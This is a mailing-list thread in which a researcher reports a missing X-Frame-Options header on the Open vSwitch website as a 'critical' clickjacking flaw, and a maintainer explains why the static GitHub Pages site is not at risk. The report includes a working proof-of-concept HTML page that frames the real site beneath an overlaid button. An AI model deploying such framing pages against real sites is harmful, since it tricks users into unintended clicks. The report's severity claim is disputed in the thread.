On 2/24/21 4:25 PM, Security Researcher wrote:
> Hi Team ,
> I hope you are doing well.
>
> Any updates on my report?
Hi. Thanks for your report, but there should be no real issue.
2 main aspects:
1. The website is just a set of static pages with sources available
in a public repository. So there is nothing to actually clickjack
here. And even if we will forbid frames from different sites to
show ours, this will not protect from the attacker to just host the
copy of our website.
2. The website is hosted on GitHub servers via github-pages and we have
no control over the HTTP headers GitHub server uses. I did ask
GitHub support and they are not going to add any X-Frame-Options
basically because of the aspect #1.
So, all the websites hosted by github-pages doesn't have any restrictive
X-Frame-Options, but that is OK since all of them are open and purely static.
Best regards, Ilya Maximets.
>
> Kind regards ,
> Vaishnavi Pardeshi
> Security Researcher
>
> On Thu, Nov 26, 2020 at 2:06 PM Security Researcher
> <vaishnaviresearc...@gmail.com <mailto:vaishnaviresearc...@gmail.com>> wrote:
>
> Dear Team ,
>
> I am Vaishnavi Pardeshi working as a security researcher and I found a
> bug in your site report of bug is as follows :
>
> a) Vulnerability name : clickjacking (CRITICAL)
>
> b) Vulnerability Description :
>
> Clickjacking (User Interface redress attack, UI redress attack, UI
> redressing) is a malicious technique of tricking a Web user into clicking on
> something different from what the user perceives they are clicking on, thus
> potentially revealing confidential information or taking control of their
> computer while clicking on seemingly innocuous web pages.
> The server didn't return an X-Frame-Options header which means that this
> website could be at risk of a clickjacking attack. The X-Frame-Options HTTP
> response header can be used to indicate whether or not a browser should be
> allowed to render a page in a <frame> or <iframe>. Sites can use this to
> avoid clickjacking attacks, by ensuring that their content is not embedded
> into other sites.
> This vulnerability affects Web Server.
>
> c) Steps to reproduce :
>
> 1. Copy URL of website and paste it in clickjacking code
>
> 2. This is sample code
>
> Create a new HTML file
>
> put <iframe src="http://www.openvswitch.org/
> <http://www.openvswitch.org/>" id="frame1" width="100%"
>
> height="100%" >
>
> 3. Open html file with another browser and click on click here and see it
> is redirected to bing.com <http://bing.com/> .
>
>
>
> d) POC :
>
> I have attached Screenshot as well as code of clickjacking :
>
> <html>
> <head>
> <title>Clickjack test page</title>
> </head>
> <style>
> #myBtn{
>
> z-index: 999;
> position: absolute;
> top: 100px;
> right: 50px;
> color: white;
> background-color: red;
> }
> </style>
>
>
>
> <body>
> <!-- <h1> A Sample Test Page </h1>
> <p>Website is vulnerable to clickjacking! </p>
>
> <p>Avoid random clicks </p> -->
> <div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%;
> height:70%">
> <iframe src="http://www.openvswitch.org/ <http://www.openvswitch.org/>"
> id="frame1" width="100%"
>
> height="100%" >
>
> </iframe></div>
> <div align="right" style="position:absolute; top:1; left:0; z-index:1;
> width: 70%;height:60%; text-align:left;">
> <a
> href="https://www.bing.com/?toWww=1&redig=D1C96AD6DC434FA59D3D2AC05339EA9B
> <https://www.bing.com/?toWww=1&redig=D1C96AD6DC434FA59D3D2AC05339EA9B>"
> target="_blank"><button id="myBtn"> click here</button></a>
>
>
> <div id="myModal" class="modal">
>
> <!-- Modal content -->
>
>
> </div>
> </body>
> </html>
>
> e) Solution :
>
>
> There are two main ways to prevent clickjacking:
>
> Sending the proper X-Frame-Options HTTP response headers that instruct
> the browser to not allow framing from other domains
> Employing defensive code in the UI to ensure that the current frame is
> the most top level window
>
> Most modern Web browsers support the X-Frame-Options HTTP header. Ensure
> it's set on all web pages returned by your site (if you expect the page to be
> framed only by pages on your server (e.g. it's part of a FRAMESET) then
> you'll want to use SAMEORIGIN, otherwise if you never expect the page to be
> framed, you should use DENY. ALLOW-FROM allows specific websites to frame the
> web page in supported web browsers).
>
> f) Impact:
>
> By using Clickjacking technique, an attacker hijack click's meant for one
> page and route them to another page, most likely for another application,
> domain, or both.
>
> With Kind regards ,
>
> Vaishnavi Pardeshi
>
>
> _______________________________________________
> security mailing list
> secur...@openvswitch.org
> https://mail.openvswitch.org/mailman/listinfo/ovs-security
>
_______________________________________________
discuss mailing list
disc...@openvswitch.org
https://mail.openvswitch.org/mailman/listinfo/ovs-discuss
